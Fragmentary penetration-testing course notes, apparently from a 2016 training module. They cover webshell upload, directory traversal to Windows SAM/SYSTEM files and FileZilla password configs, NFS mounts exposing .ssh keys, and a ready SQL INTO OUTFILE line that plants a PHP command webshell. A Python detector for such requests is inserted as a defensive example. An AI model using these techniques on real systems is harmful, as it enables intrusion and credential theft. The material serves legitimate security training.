Nathanf | Advanced Penetration Testing | Module 7 - Exploitation

By: Nathanf | Related Course: Advanced Penetration Testing | Published: November 14, 2016 | Modified: November 14, 2016
Notepad exploit 1

cadaver (WebDAV client)

Kali has pre-built web shells in different languages

Step 1 – upload a file to the server that executes code for you or allows you to execute code (a webshell)

-upload a file that takes command injection via URL query parameters

This can also be done via Metasploit

-for a reverse_tcp handler, set ExitOnSession to false in the options so it doesn't stop listening after the first session



Notepad exploit 3

Directory traversal – dump SAM files to discover usernames and passwords

Directory traversal – can also be done from the URL

index?../../../../../bin.etc – if the browser offers to save the file we've found it, otherwise we haven't

WINDOWS/system32/sam

Windows/repair/sam – saved file, but you need the SYSKEY to access it, which comes from

../../../../../WINDOWS/repair/system

FileZilla FTP

../../../../../xamp/FileZillaFtp/FileZilla server.xml – the FileZilla config file stores passwords


Notepad exploit 4

/tikiwiki

search Metasploit for exploits


Notepad exploit 6

whoami = display which user you are


Notepad exploit 6

display network file system exports: in the CLI -> showmount -e 'ip'

 

 

to mount an exported network filesystem

mount -t nfs -o nolock 'ip':/exportDir /exportlocation

hidden files: ls -a

the .ssh directory stores keys

 


Notepad exploitation 2

open web interface – phpMyAdmin, can be used to run SQL (injection) commands

creating a system command shell that accepts a parameter via the URL, to sit on the server, via SQL

run system command ->

select "<?php system($_GET['cmd']); ?>" into outfile "C:\\xamp\\htdocs\\shell.php"

\\ = escaped backslash, so you don't end up with a long file name on the system
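Defensive counterpart to the traversal notes (Notepad exploit 3) and the shell.php?cmd= webshell above, as an added example that is not part of these course notes: a small Python detector run over constructed Apache-style access-log lines. The log format, the IPs and the sensitive-path list are assumptions, and it decodes URLs repeatedly so double-encoded ../ sequences are caught too.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined-style), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Nov/2016:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.9 - - [14/Nov/2016:10:01:07 +0000] "GET /index.php?page=../../../../../WINDOWS/repair/sam HTTP/1.1" 200 24576
10.0.0.9 - - [14/Nov/2016:10:01:09 +0000] "GET /index.php?page=..%2F..%2F..%2FWINDOWS/repair/system HTTP/1.1" 200 262144
10.0.0.9 - - [14/Nov/2016:10:02:15 +0000] "GET /index.php?page=../../xampp/FileZillaFtp/FileZilla%20Server.xml HTTP/1.1" 200 3072
10.0.0.9 - - [14/Nov/2016:10:03:01 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 40
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# ".." that starts the path or follows a separator / query delimiter.
TRAVERSAL_RE = re.compile(r"(^|[/=&?])\.\.(/|$)")
# Files the notes above name as traversal targets (assumed list, lower-case, forward slashes).
SENSITIVE = ("/system32/config/sam", "/repair/sam", "/repair/system",
             "filezilla server.xml", "/etc/passwd", "/etc/shadow")
# Query parameters commonly used by simple command webshells ($_GET['cmd']).
WEBSHELL_RE = re.compile(r"[?&](cmd|exec|command)=")

def normalize(path: str) -> str:
    """URL-decode until stable (catches %252e%252e), unify slashes, lower-case."""
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    return path.replace("\\", "/").lower()

def classify(line: str):
    """Return a dict with tags for one log line, or None if it does not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path = normalize(m.group("path"))
    tags = []
    if TRAVERSAL_RE.search(path):
        tags.append("traversal")
    if any(s in path for s in SENSITIVE):
        tags.append("sensitive-file")
    if WEBSHELL_RE.search(path):
        tags.append("webshell-cmd")
    return {"ip": m.group("ip"), "path": path, "status": int(m.group("status")), "tags": tags}

def find_alerts(log_text: str):
    """All parsed lines that carry at least one tag."""
    return [r for r in map(classify, log_text.splitlines()) if r and r["tags"]]
```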

 

atftpd --daemon --bind-address 'ip' /tmp

netstat -antp

--daemon = it keeps running in the background and listening

other shell -> PowerShell

tftp = Trivial File Transfer Protocol

